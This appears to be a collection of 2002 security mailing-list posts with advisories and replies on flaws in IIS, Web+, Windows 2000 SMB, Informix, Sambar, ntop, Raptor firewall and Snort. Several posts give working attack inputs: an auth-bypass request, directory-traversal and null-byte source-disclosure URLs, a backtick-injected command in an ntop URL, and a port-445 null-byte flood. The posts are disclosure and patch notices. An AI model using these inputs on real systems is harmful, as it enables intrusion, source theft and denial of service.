 Host: hostname
 Authorization: Basic
 [enter]
 [enter]

No credentials are required as, technically the auth_type envariable has
been set, regardless of whether a user name or password have been supplied.

Risk and Mitigating Factors
***
By default the Back Office Web Administrator is limited to the loopback
address (127.0.0.1) which means that it can't be accessed remotely. However,
it is not uncommon to change this to allow for remote administration; tying
the Administrator to the loopback address makes it somewhat useless.

Basic authentication also needs to be enabled which, again, is not uncommon.

Fix Information
***
For those that match this criteria they are strongly urged to obtain the the
patch from Microsoft. Please see
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316838; for more
details.

A check for this issue has also been added to Typhon II, NGSSoftware's
vulnerabilty assessment scanner. For more information about Typhon, please
see the NGSSite @ http://www.ngssoftware.com/.





Ammendum: A crash course with Linux Kernel 2.4.x, IP ID values RFC 791

2002-04-17 Thread Ofir Arkin

This was edited out by mistake:

---
Thanks:
I would like to thank Toby Miller for the TCP trace and help with 
verifying findings.
---

Thanks

-- 
Ofir Arkin
Managing Security Architect
@stake, Limited.
http://www.atstake.com
email: [EMAIL PROTECTED] 






Buffer Overrun in Talentsoft's Web+ (3) (#NISR17042002B)

2002-04-17 Thread NGSSoftware Insight Security Research

NGSSoftware Insight Security Research Advisory

Name:Web+ Cookie Buffer Overflow
Systems Affected:  IIS and Web+ 4.6/5.0 on Windows NT/2000
Severity:  High Risk
Vendor URL:   http://www.talentsoft.com
Author:   David Litchfield ([EMAIL PROTECTED])
Date:   17th April 2002
Advisory number: #NISR17042002B
Advisory URL:  http://www.ngssoftware.com/advisories/webplus3.txt

Issue: Attackers can run arbitrary code as SYSTEM on the web server.

Description
***
Talentsoft's Web+ v5.0 is a powerful and comprehensive development
environment for use in creating web-based client/server applications.

Details

By requesting a WML file from a web server and supplying an overly long
cookie, an internal buffer is overflowed, overwriting a saved return address
on the stack. On procedure return control over the web server process'
execution can be gained. If the server is running IIS 4 and using the Web+
ISAPI filter, then inetinfo.exe is the process captured. As this runs as
SYSTEM, any code supplied by an attacker will run uninhibited. If IIS 5.0
then the process is dllhost.exe which runs in the context of the IWAM_*
account. As this has limited privileges the risk is reduced. If the Web+
environment is set up using the webplus CGI executable, webplus.exe, on
either server, then, again, the risk is reduced.


Fix Information
**
Talentsoft have created a patch for this problem. Please see
http://www.talentsoft.com/download/download.en.wml for more details.
NGSSoftware urges all Web+ customers to apply this as soon as is possible. A
check for this issue has been added Typhon II, NGSSoftware's vulnerability
assessment scanner, of which more information is available from the NGSSite
@ http://www.ngssoftware.com/.

Further Information
***
For further information about the scope and effects of buffer overflows,
please see

http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf





KPMG-2002011: Windows 2000 microsoft-ds Denial of Service

2002-04-17 Thread Peter Gründl



  -=Windows 2000 microsoft-ds Denial of Service=-
  courtesy of KPMG Denmark

BUG-ID: 2002011
Released: 17th Apr 2002

Problem:

The default LANMAN registry settings on Windows 2000 could allow a
malicious user, with access to TCP port 445 on your Windows 2000, to
cause a Denial of Service.


Vulnerable:
===
- Windows 2000 Server (SP0, SP1, SP2)
- Windows 2000 Advanced Server (SP0, SP1, SP2)
- Windows 2000 Professional (SP0, SP1, SP2)


Details:

Sending malformed packets to the microsoft-ds port (TCP 445) can
result in kernel ressources being allocated by the LANMAN service.
The consequences of such an attack could vary from the Windows
2000 host completely ignoring the attack to a blue screen.

An attack could be something as simple as sending a continuous
stream of 10k null chars to TCP port 445.

The most common symptoms would be that the LANMAN service would
allocate a lot of kernel memory, until a point, where very few
applications would be able to run. The routine that draws windows
would commence to draw incomplete windows, the warning beep
would be replaced by an error stating that the sound driver could
not be loaded. Internet Information Server would no longer be
able to service .asp pages, attempts to reboot the server (as
administrator) would result in the error You do not have
permissions to shutdown or restart this computer., aso.

It would frequently be possible to cause the system service
to enter a state where it constantly used 100% CPU usage.
A PC was left in this state over the weekend, to see if it
would recover on it's own. It did not recover.


Vendor URL:
===
You can visit the vendors webpage here: http://www.microsoft.com


Vendor response:

The vendor was contacted mid-October, 2001. The vendor released a
Q-article, describing the problem and possible solutions on the 11th
of April, 2002. KPMG was notified of the publication on the 17th of
April, 2002.


Corrective action:
==
The vendor has suggested two possible solutions, available here:
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q320751


Author: Peter Gründl ([EMAIL PROTECTED])


KPMG is not responsible for the misuse of the information we provide
through our security advisories. These advisories are a service to
the professional security community. In no event shall KPMG be lia-
ble for any consequences whatsoever arising out of or in connection
with the use or spread of this information.





IBM Informix Web DataBlade: Local root by design

2002-04-17 Thread Simon Lodal

IBM Informix Web DataBlade: Local root by design

By Simon Lodal, Denmark
Vendor status: Notified months ago, said they would be working on
updates, never heard anything.
Software: Web DataBlade 4.12, IDS 9.20/9.21, Linux 2.2/2.4, SunOS 5.7
(OS, IDS and WDB versions seem to be irrelevant).

Impact: Any user who can: 1) Save a Perl script anywhere on the server's
disk, 2) Run WebDataBlade HTML code of his own choice (calling that Perl
script) ... can execute any code of choice as the database uid, which is
usually root. Any WDB developer can do this. Any other local user with
admin right on any database can do it by loading the WDB module into
their database. Other local users will not be able to exploit this by
default, but if just one WDB developer has lax permissions on his
scripts, other users may modify it to assign root access to themselves.
Finally, the SQL injection vulnerability (other report) allows any
remote user to save Perl script and execute it from HTML code. These
vulnerabilities can therefore be combined into a remote root exploit.

Workaround: Disable the entire Perl script feature. I believe it must be
enabled explicitly, but that may depend on how you got Web DataBlade.
However, any site needing to send mail, copy/move/create/delete external
files, or otherwise communicate with the world outside the database,
will usually need to use this feature, as it is the easiest way to do
these things (alternatives are C and Java).


---
Details

The Web DataBlade has an unrestricted facility for running commands of
choice as the database user. The database runs as root, unless you have
taken special precautions to start it as another user. Therefore you get
root, by design. Or at least informix, if the administrator managed to
start the database as this user.

The Web DataBlade language has no builtin commands for dealing with
files, network etc. Instead, Informix allows calling external scripts.
Such a feature, you would think, would simply allow execution of shell
commands, like system(). But Informix decided a much more complex setup
using a long-running daemon written in Perl. You can not call shell
commands from the HTML pages, instead pages instructs the daemon to
execute a labeled piece of (Perl) code; a meta function. The Perl
daemon is connected through a socket connection. The daemon is started
the first time a function in it is called, and keeps running until the
database itself is shutdown.

This design may look nice. Some actions can be done with Perl code
alone, avoiding spawning a new process and thus potentially gaining
speed. Too, it limits what commands can be run; this is decided by the
person who has access to change the Perl script. And it can take some
complexity away from the HTML code.

But now the trouble. Anyone with write access to somewhere on the
server's disk can add his own Perl script. Anybody who can add WDB HTML
code request his own page and thus call the script and the functions
within it. Several different Perl daemons can run simultaneously, and
there are no restrictions on where the scripts should be placed, who can
call the actions within them, who should own them or what their
permissions should be.

All this would not be so bad, if the script were just run as
stand-alone, one-shot shell commands, running under the uid of the
calling user. But the scripts are started by the database, and keep
running as the database user (again, usually root), regardless of
caller's identity. Simply said, you can create a Perl script of choice
and have it run as root.

Unfortunately this is an utter design mistake which can not easily be
fixed, at least not without breaking existing scripts. The Webdriver
module usually logs into the database using one specific
username/password, but it can also be configured to login on behalf of
the actual user making the connection to the webserver. This would not
be a problem if external commands were executed as separate processes
running under the uid of the connecting user, but here we are dealing
with a daemon executing commands on behalf of possibly many different
uids (any uid which the webdriver can connect as). And in their infinite
wisdom Informix decided that when we dont know which uid we will serve,
they'll better just get the uid of the database server itself, which
usually happens to be root. They simply did not even think about how to
deal with the change of uids. A brief discussion I had with a developer
at Informix clearly indicated complete lack of understanding of this
problem.

As a sidenote, Informix' own example script contains an action which is
intended to allow execution of user-defined Perl code...

Proof of concept: I am not going to provide the exact syntax here since
that does not help the description any further. Anyone with access to a
machine running WDB can fetch the example script and modify it. Try fx
to write a new file, and see who gets to own it.


Simon Lodal



Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure

2002-04-17 Thread H D Moore

Right, you can only access files ending in the four allowed extensions.
These extensions are: .asp, .inc, .htm, and .html.

-HD

On Wednesday 17 April 2002 07:25 am, Randy Hinders wrote:
 While checking various files and extensions I wanted to ensure that other
 files were still protected from this.  I was not able to read the
 global.asa but was able to read (as expected) other asp pages..

 http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%
c0%ae%c0%ae/global.asa Returned View Active Server Page Source-- Access
 Denied to the browser.

 http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%
c0%ae%c0%ae/iisstart.asp Returned the source code to the browser.




RE: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure

2002-04-17 Thread Randy Hinders

While checking various files and extensions I wanted to ensure that other 
files were still protected from this.  I was not able to read the 
global.asa but was able to read (as expected) other asp pages..

http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/global.asa
Returned View Active Server Page Source-- Access Denied to the browser.

http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/iisstart.asp
Returned the source code to the browser.

Yes, the IISSAMPLES and all other SDK items should never be installed on a 
production machine, but should a client upload this code to a shared hosting 
environment where the global.asa is properly protected with NTFS permissions 
they will not be able to gain access to the source code through this method.

HTH

Randy Hinders
MCT (ret.), MCSE, MCP +I  A+
NT Systems Administrator
DONet, Inc
www.donet.com
www.adsi4nt.com
~~Hoka Hey, Lakotas~~



-Original Message-
From: H D Moore [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, April 16, 2002 11:01 PM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure


--[ Microsoft IIS 5.0 CodeBrws.asp Source Disclosure

Summary:

Microsoft's IIS 5.0 web server is shipped with a set of
sample files to demonstrate different features of the ASP
language. One of these sample files allows a remote user to
view the source of any file in the web root with the extension
.asp, .inc, .htm, or .html. The IISSamples virtual directory
should not be left on production servers in the first place,
but until now there were no serious[1] vulnerabilities found in
those sample scripts. Microsoft was _not_ contacted about
this, they can read the lists like everyone else. This is an
issue that can be fixed by proper system administration.

snip


_
Chat with friends online, try MSN Messenger: http://messenger.msn.com




Microsoft Security Bulletin MS02-019: Unchecked Buffer in Internet Explorer and Office for Mac Can Cause Code to Execute (Q321309)

2002-04-17 Thread Microsoft

-BEGIN PGP SIGNED MESSAGE-

- --
Title:  Unchecked Buffer in Internet Explorer and Office for 
Mac Can Cause Code to Execute (Q321309)
Date:   16 April 2002
Software:   Microsoft Internet Explorer 5.1 for Macintosh, Microsoft
Outlook Express 5.0 for Macintosh, Microsoft Office v. X,
for Macintosh, Microsoft Office 2001 for Macintosh,
Microsoft PowerPoint 98 for Macintosh
Impact: Run Code of Attacker's Choice
Max Risk:   Critical
Bulletin:   MS02-019

Microsoft encourages customers to review the Security Bulletin at: 
http://www.microsoft.com/technet/security/bulletin/MS02-019.asp.
- -
- --

Issue:
==
This is a cumulative patch that, when applied, eliminates all
previously released security vulnerabilities affecting IE 5.1 for
Macintosh, and Office v. X for Macintosh. In addition, it eliminates
two newly discovered vulnerabilities. 

 - The first is a buffer overrun vulnerability associated with the
   handling of a particular HTML element. Because of support for
   HTML in Office applications, this flaw affects both IE and Office
   for Macintosh. A security vulnerability results because an
   attacker can levy a buffer overrun attack against IE that attempts
   to exploit this flaw. A successful attack would have the result of
   causing the program to fail, or to cause code of the attacker's
   choice to run as if it were the user. 

 - The second is a vulnerability that can allow local AppleScripts
   to be invoked by a web page. This vulnerability can allow locally
   stored AppleScripts to be invoked automatically without first
   calling the Helper application. The AppleScripts would run as if
   they had been launched by the user, and could take the same
   actions as any AppleScript legitimately launched by the user.
   The AppleScript would have to already be present on the system;
   there is no way for an attacker to deliver an AppleScript of her
   choosing through this vulnerability.

Mitigating Factors:

Unchecked Buffer in HTML Element: 

 - Successfully exploiting this issue with Office files requires
   that a user accept files from an unknown or untrusted source.
   Users should never accept files unknown or untrusted sources.
   Accepting files only from trusted sources can prevent attempts
   to exploit this issue. 

 - A successful attack using HTML email would require specific
   knowledge of the user's mail client and cannot be mounted against
   PC users. 

 - A successful attack using an HTML web page would require the
   attacker to lure the user to visiting a site under her control.
   Users who exercise caution in their browsing habits can
   potentially protect themselves from attempts to exploit this
   vulnerability. 

 - On operating systems that enforce security on per-user basis,
   such as Mac OS X, the specific actions that an attacker's code
   can take would be limited to those allowed by the privileges of
   the user's account. 

Local AppleScript Invocation: 

 - The vulnerability only affects IE on Mac OS 8  9. 

 - A successful attack requires that the attacker know the full path
   and file name of any AppleScript they want to invoke.
 
 - The vulnerability provides no means to deliver an AppleScript of
   the attacker's construction: it can only invoke AppleScripts
   already present on the user's system.

Risk Rating:

 - Internet systems: None
 - Intranet systems: None
 - Client systems: Critical

Patch Availability:
===
 - A patch is available to fix this vulnerability. Please read the 
   Security Bulletin at
   http://www.microsoft.com/technet/security/bulletin/ms02-019.asp
   for information on obtaining this patch.

Acknowledgment:
===
 - Josha Bronson of AngryPacket Security 
   (http://sec.angrypacket.com/) and w00w00 
   (http://www.w00w00.org/).

- -

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS 
PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS
ALL 
WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE 
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
IN NO EVENT 
SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY
DAMAGES 
WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL,
LOSS OF 
BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR
ITS 
SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME
STATES DO 
NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL
OR 
INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.

-BEGIN PGP SIGNATURE-
Version: PGP 7.1

iQEVAwUBPLxxfo0ZSRQxA/UrAQE1+Qf9FvSoqxdKNi+ItrLWFwonzQRJSBlYc71Q
2WnjCf2e4HeYf72oulucu9k3C+3FEfaduoHIUP+i/4ZHMRdkDicutwNcKxchhmzr

Re: Snort exploits

2002-04-17 Thread Dragos Ruiu

Heh, well... first... don't panic. :-)

First of all I would like to commend Dug on his responsible disclosure stance.
He has given the IDS vendors several months heads up that this stuff is in the 
pipe...  I think everyone who needed to know knew this was coming down the pipe,
so this is in _no_ way critical of him.

I was actually expecting him to release fragroute on the CanSecWest conference CD,
for his talk on it there and am preparing some appropriate counter measures for the 
variant of snort I was going to put on there.  Been kinda swamped with conference 
preparations so please do not ask me for any of this in advance of the conference.
Odds are now that this info has gone out snort cvs will have fixes for this
in a matter of hours or days...

The TCP evasions are fairly easily detectable as overlaps should not normally occur.
I'm sure Marty or Andrew will be releasing some tweaks to stream4 shortly to 
address this. It is just a matter of slightly more rigorous alerting and
an occasional little bit of extra noise.

Similarly the IP fragmentation detection just needs slightly more rigorous
overlap detection and alerting, as these overlaps will not be occurring in 
normal situations.  For now as a workaround you can just alert on small fragments
(resurrect minfrag... heh) which should be indicative of games being played.
Note that some of these overlaps were successful in snort 1.8.x because the
teardrop detection had a bug in it which was recently found and was only fixed 
again in snort 1.8.4.  The moral of the story is that it pays to keep your copy
of snort current. :-)

Basically all the chaffing at the IP and TCP level is detectable as those 
should not be normal conditions. Look to snort cvs over the next few days
for solutions to these issues...

To Dug:

As far as playing timing games in the future, well the solution for this and some
other problems will be target based reassembly which varies reassembly timing
and overlap behaviour based on destination to mimic host specifics.  And though
the current frag2 snort defragger features deterministic timeout behaviour
the earlier defrag reassembler had non-deterministic timeout behaviours on purpose
to specifically avoid timeout games and this kind of behaviour will likely be 
resurrected on future defraggers. I have had a defragger in the works for, oh, 
a long time... :)  that fixes this and some other issues. Guess Marty, I, and 
the other snort developers have to get off our lazy asses (since snort development 
proceeds so slowly :-) and fix that now.  Heh... I'm being sarcastic for those 
that didn't note.

The same logic and procedures can be applied at the TCP level as well as
at the IP fragmentation layer BTW.

To everyone else:

The game of evasion and coutermeasures is the snake eating its tail and you 
shouldn't be naive and assume that there aren't other evasions out there because 
there are _always_ other obfuscations and countermeasures, and then detectors for 
those. That's why you pay us snort developers the big bucks, and you should keep
your ids builds current fairly often... to keep you safe from that. :-)

But using fairly loaded terms like blindside is just excessively alarmist imho.

cheers,
--dr


On Tue, 16 Apr 2002 20:07:12 -0700
[EMAIL PROTECTED] wrote:

 
 I didn't see it posted to these lists, but yesterday Dug Song quietly released a 
tool on the focus-ids list which totally blindsides Snort - 
http://www.monkey.org/~dugsong/fragroute/index.html. His README.snort file contains 
several fragroute scripts which blindside even the current Snort version in CVS, 
tested on RedHat 7.2. For example, the latest wu-ftpd exploits run through the one 
line tcp_seg 1 new don't trigger any Snort alerts at all.
 :( :(
 
 Fragroute is a very powerful new tool. Has anyone found other attacks against Snort 
with it, or tried it against any other IDS for that matter?
 
 
 -=+ 0xCafeBabe +=-
 
 
 
 
 Hush provide the worlds most secure, easy to use online applications - which 
solution is right for you?
 HushMail Secure Email http://www.hushmail.com/
 HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/
 Hush Business - security for your Business http://www.hush.com/
 Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/
 
 Looking for a good deal on a domain name? 
http://www.hush.com/partners/offers.cgi?id=domainpeople
 
 


-- 
--dr  pgpkey: http://dragos.com/dr-dursec.asc
  CanSecWest/core02 - May 1-3 2002 - Vancouver B.C. - http://cansecwest.com




RE: Raptor Firewall FTP Bounce vulnerability

2002-04-17 Thread Lysel Christian Emre

 Firewall: Raptor 6.5.3i on Sun Solaris 7

Raptor (SEF) 7.0 on Windows NT4.0, can also be exploited.

Note: Has Symantec Support been notified?



RE: Raptor Firewall FTP Bounce vulnerability

2002-04-17 Thread Roy Hills

Thanks for the info.

Yes, Symantec support were notified on 5 April 2002.

Roy Hills

At 13:35 17/04/02 +0200, Lysel Christian Emre wrote:
  Firewall: Raptor 6.5.3i on Sun Solaris 7

Raptor (SEF) 7.0 on Windows NT4.0, can also be exploited.

Note: Has Symantec Support been notified?

--
Roy HillsTel:   +44 1634 721855
NTA Monitor Ltd  FAX:   +44 1634 721844
14 Ashford House, Beaufort Court,
Medway City Estate,  Email: [EMAIL PROTECTED]
Rochester, Kent ME2 4FA, UK  WWW:   http://www.nta-monitor.com/




segfault in ntop

2002-04-17 Thread JP

I'm sorry if this has already been discussed on here before, but I went
through the thread and saw nothing on it.

I was able to remotley segfault ntop v.2.0.0 using Netscape 6.1 by simply
specifying a command in the url location bar.  For example:

http://ntop.site.com:port/`ls`

That above command will cause ntop to segfault and core dump.  I tried a
few different commands, ls and su segfaulted ntop, whereas everything else
I tried gave a 403 error, but ntop stayed online.

Here's information about my ntop platform:

Mandrake Linux v8.1 kernel 2.4.8-26mdk
ntop v.2.0.0 MT [i686-pc-linux-gnu] (01/24/02 03:04:18 PM build)

I was able to segfault ntop from the following platforms:

Mandrake Linux v8.1 kernel 2.4.8-26mdk with Netscape v6.1
(Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1)

Mandrake Linux v8.1 kernel 2.4.8-26mdk with Opera 5.0 for Linux - 20010510 Build 024 
-[5]

Windows 2000 Server 5.00.2195 SP2 with Netscape v6.2.2
(Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.4.1)
Gecko/20020314 Netscape6/6.2.2)

I was unable to duplicate this segfault with the following browsers:

Internet Explorer v6.0.2600.
Konqueror v2.2.1

I did not test any other platforms or browsers than the ones listed here.
I have notified ntop and haven't received a response yet.

Thanks,

jason




KPMG-2002012: Sambar Webserver Serverside Fileparse Bypass

2002-04-17 Thread Peter Gründl



  -=Sambar Webserver Serverside Fileparse Bypass=-
  courtesy of KPMG Denmark

BUG-ID: 2002012
Released: 17th Apr 2002

Problem:

A flaw in the serverside URL parsing could allow a malicious user to
bypass serverside fileparsing and display the sourcecode of scripts.
The same flaw could allow a malicious user to crash the web service.


Vulnerable:
===
- Sambar Webserver V5.1p on Windows 2000
- Other versions were not tested.


Details:

It is possible to bypass the serverside parsing of scripts, such as
.pl, .jsp, .asp, .stm and download the sourcecode. The bypassing also
opens up for a request to certain DOS-devices that the server would
then attempt to access. These ressources used in such requests are
not freed properly and as a result, the web server will eventually
run out of memory and the operating system will kill the web
service.

To bypass the serverside parsing, an attacker would have to access
the ressource with a suffix of spacenull. There are a lot of
ways to achieve this in eg. Internet Explorer, and an example of
sourcecode exposure could be:

http://server/cgi-bin/environ.pl+%00

which would return the following (perl sourcecode):

read(STDIN, $CONTENT, $ENV{'CONTENT_LENGTH'});
print GATEWAY_INTERFACE: $ENV{'GATEWAY_INTERFACE'}
PATH_INFO:  $ENV{'PATH_INFO'}
PATH_TRANSLATED:  $ENV{'PATH_TRANSLATED'}
QUERY_STRING:  $ENV{'QUERY_STRING'}
REMOTE_ADDR:  $ENV{'REMOTE_ADDR'}
REMOTE_HOST:  $ENV{'REMOTE_HOST'}
REMOTE_USER:  $ENV{'REMOTE_USER'}
REQUEST_METHOD:  $ENV{'REQUEST_METHOD'}
DOCUMENT_NAME:  $ENV{'DOCUMENT_NAME'}
DOCUMENT_URI:  $ENV{'DOCUMENT_URI'}
SCRIPT_NAME:  $ENV{'SCRIPT_NAME'}
SCRIPT_FILENAME:  $ENV{'SCRIPT_FILENAME'}
SERVER_NAME:  $ENV{'SERVER_NAME'}
SERVER_PORT:  $ENV{'SERVER_PORT'}
SERVER_PROTOCOL:  $ENV{'SERVER_PROTOCOL'}
SERVER_SOFTWARE:  $ENV{'SERVER_SOFTWARE'}
CONTENT_LENGTH:  $ENV{'CONTENT_LENGTH'}
CONTENT:  $CONTENT
END


Vendor URL:
===
You can visit the vendors webpage here: http://www.sambar.com


Vendor response:

The vendor was contacted 3rd of April, 2002. The vendor confirmed the
bug on the same day, and notified us that a patch was being developed.
On the 17th of April, the vendor released a new version that corrects
the issues.


Corrective action:
==
The vendor has released Version 5.2b, which is available here:
http://sambar.dnsaloas.org/win32-preview.tar.gz


Author: Peter Gründl ([EMAIL PROTECTED])


KPMG is not responsible for the misuse of the information we provide
through our security advisories. These advisories are a service to
the professional security community. In no event shall KPMG be lia-
ble for any consequences whatsoever arising out of or in connection
with the use or spread of this information.





IBM Security Advisory: IBM Tivoli Policy Director WebSEAL

2002-04-17 Thread Michael S Soukup

-BEGIN PGP SIGNED MESSAGE-

IBM SECURITY ADVISORY

Wed Apr 17 13:05:19 CDT 2002
=
   VULNERABILITY SUMMARY

VULNERABILITY:Induced failure of IBM Tivoli Policy
  Director WebSEAL component

PLATFORMS:All platforms running IBM Tivoli Policy Director
  WebSEAL, version 3.8, initial release, and using
  SSL smart junctions

SOLUTION: Apply the FixPaks, listed in this Advisory

THREAT:   Malicious user can cause WebSEAL server failure

CERT Advisory:NONE

=
   DETAILED INFORMATION

I.  Description

Background

A correspondent to SecurityFocus' BUGTRAQ in December 2001 (see
http://online.securityfocus.com/archive/1/245283) reported a possible
denial-of-service vulnerability in IBM Tivoli Policy Director
WebSEAL, v3.8.

Discussion

We have reviewed the purported problem and have concluded that there is
no denial of service vulnerability. IBM Tivoli Policy Director v3.8,
however contains a defect related to the use of SSL junctions between
the WebSEAL component and Web Servers. This defect can cause the WebSEAL
component to fail if SSL junctions are being used, and certain URLs
are then passed across these junctions.

This exposure was corrected as part of a regular fixpack cycle, in
Policy Director WebSEAL 3.8 Fixpack 1.


II. Impact

Customers using the original (Gold Master) release of IBM Tivoli Policy
WebSEAL Version 3.8, who also incorporate SSL junctions in their
deployment, may be subject to WebSEAL server failures.

III.  Solutions


  Workaround

There is no workaround.


  Official fix

The solution to this security-related exposure is to apply Fixpack
1 for the IBM Tivoli Policy Director WebSEAL, v3.8.

IBM recommends that customers always stay current with fixpacks
for all software products.  All registered customers have access to the
Tivoli Patches download site, and can access the IBM Tivoli Policy
Director WebSEAL 3.8 Fixpack 1 at:

https://www.tivoli.com/secure/support/patches/Tivoli_SecureWay_Policy_Director_WebSEAL_.html#3.8-PWS-0001



IV.  Contact Information

Comments regarding the content of this announcement can be directed to:

   [EMAIL PROTECTED]

To request the PGP public key that can be used to encrypt new
AIX security vulnerabilities, send email to:

[EMAIL PROTECTED]

with a subject of get key.


If you would like to subscribe to the AIX security newsletter,
send a note to [EMAIL PROTECTED] with a subject of
subscribe Security.

To cancel your subscription, use a subject of unsubscribe Security.
To see a list of other available subscriptions, use a subject of help.

IBM and AIX are a registered trademark of International Business Machines
Corporation.  All other trademarks are property of their
respective holders.


-BEGIN PGP SIGNATURE-
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQCVAwUBPL3CCwsPbaL1YgqvAQHZlwP/XQn1Q/GAfBaBHL2acrHLXFzWQ2tXoRvO
ugkbBJkEBBrkeAiHbM7i0u8uXA7gqn+6S0QmFU6y8sQ9VfldlTh7/C/0fxFNlJ9Y
Pb+njBRfala9417OUPXhBK4aUeRZxqWaFeGTPz+Jkx8CutTmHOE1vP6sioBM8ncr
ulXP+XiOJ5o=
=Iknk
-END PGP SIGNATURE-




Re: Raptor Firewall FTP Bounce vulnerability

2002-04-17 Thread William Aguilar


In-Reply-To: [EMAIL PROTECTED]

Symantec Enterprise Firewall FTP Bounce 
Vulnerability

Date Discovered
April 16, 2002

Risk 
Medium (dependent on customer configuration)

Affected Versions: 
Raptor Firewall V6.5.3 (Solaris)
Symantec Enterprise Firewall V7.0 (Solaris)

Overview
Symantec is aware of an FTP Bounce Vulnerability 
condition reported in Bugtraq ID# 267784 
(http://online.securityfocus.com/archive/1/267784).  
This potential vulnerability could affect some 
Symantec Enterprise Firewall deployments. Using 
this FTP-protocol based vulnerability, an attacker 
could potentially hide an attack by using the firewall 
identity against an unsuspecting and unprotected 
external machine.  In addition, by overwriting the 
PORT command with its own internal address, the 
firewall overwrites the FTP-server built-in protection 
mechanism that protects against this type of attack.

Recommendation
If the FTP Bounce Attack affects your deployment, 
please make sure you apply the related hotfix 
available from the Symantec Enterprise Support site.  
This hotfix is an enhanced version of our FTPd 
module for the affected platforms that extends the 
protection currently provided by the firewall.  We are 
currently investigating if this problem impacts our 
remaining supported products and platforms and we 
will release enhanced versions of the FTPd module 
as necessary.

This module update is available for download from 
the Symantec Enterprise Support site 
(http://www.symantec.com/techsupp).  The following 
enhancements have been made to the FTPd module 
for Solaris:

1)  By default, if the firewall detects a PORT 
request destined for an IP address other than the IP 
address of the FTP client, it will log the following 
warning:

#8220;353 Warning: PORT command referenced a 
destination (x.x.x.x) that doesn't match control 
channel (y.y.y.y): possible Bounce attack? To enforce 
strict PORT checking please 
set #8220;ftpd.allow_address_mismatch=False#8221; in the 
Config.cf file.#8221;

If the firewall administrator decides that this is not a 
problem in their environment, they can disable this 
Warning message by setting the following Config.cf 
variable:

ftpd.suppress_address_mismatch_warning=True 
(default is False)

2)  If the firewall administrator wishes to 
enforce strict PORT command checking and block 
any PORT requests that reference a different 
address than the original FTP client IP they can set 
the following Config.cf variable:

ftpd.allow_address_mismatch=False (default is True)

By enforcing #8220;strict#8221; PORT checking on the firewall, 
security administrators do not have to make sure that 
all of their FTP servers are patched or configured to 
block the FTP Bounce Attack.

These security enhancements were verified by 
Symantec and ICSA Labs (www.icsalabs.com). The 
new features will extend the enterprise-level 
protection provided by our FTP proxy which among 
other checks already includes protection against FTP 
Bounce attacks off the firewall itself, blocking PORT 
commands that select a well-known port, FTP 
strong/weak user authentication methods, GET/PUT 
granular security policies, FTP protocol and 
command verification, and transparent address 
hiding.

Technical Description
The FTP Bounce attack exploits a known design flaw 
in the FTP standard.  All RFC compliant FTP servers 
must support the PORT command.  The PORT 
command is used between an FTP client and server 
to coordinate the data channel connection between 
the two devices.  The RFC dictates that a connection 
for the data channel should be allowed to any IP 
address and any port.  However, this RFC-
compliancy renders FTP Servers vulnerable to 
misuse of the PORT command.  For a more detailed 
explanation of this issue please see CERT® Advisory 
CA-1997-27 FTP Bounce and the related technical tip.

The Symantec Enterprise Firewall automatically 
rewrites the PORT command with either the address 
of the client machine or the firewall address.  In either 
case when the PORT request reaches the FTP 
server, the PORT command will match the source 
address of the FTP client.  If configured, the FTP 
server scans the packet to make sure the PORT 
command matches the IP address of the client, and 
in all cases it does.  The FTP server then attempts to 
open a data connection to the client IP address, 
which then gets translated by the firewall to the 
victim#8217;s IP address.  This is not a desired behavior 
since it gives the security administrator a false sense 
of protection from an FTP bounce attack.



Copyright (c) 2002 by Symantec Corp.
Permission to redistribute this Alert electronically is 
granted as long as it is not edited in any way unless 
authorized by Symantec Security Response. 
Reprinting the whole or part of this Alert in medium 
other than electronically requires 

Re: An alternative method to check LKM backdoor/rootkit

2002-04-17 Thread Florian Weimer

Paul Starzetz [EMAIL PROTECTED] writes:

 Be sure that this will be fixed in the next 'generation' of LRKM's.
 Patching the device methods for disk special nodes is not a big deal -
 why not to incorporate even your code into one of the nice LRKM's? You
 probably found a weaknes of 'current' LRKM's but in general it is a bad
 idea to check your machine while running a compromised kernel.

I agree.  You can never be sure which kernel you are running.  An
attacker could have placed a modified kernel on a swap device (which
excludes this very area from being used as swap space), and tweaked
the boot loader to load the modified kernel.

Using this approach, the modified kernel image can be made completely
invisible easily, and it still survives reboot.  Such a modification
is very hard to spot even during an offline analysis, and the
checklists I've seen so far do not address this problem at all.

-- 
Florian Weimer[EMAIL PROTECTED]
University of Stuttgart   http://CERT.Uni-Stuttgart.DE/people/fw/
RUS-CERT  +49-711-685-5973/fax +49-711-685-5898



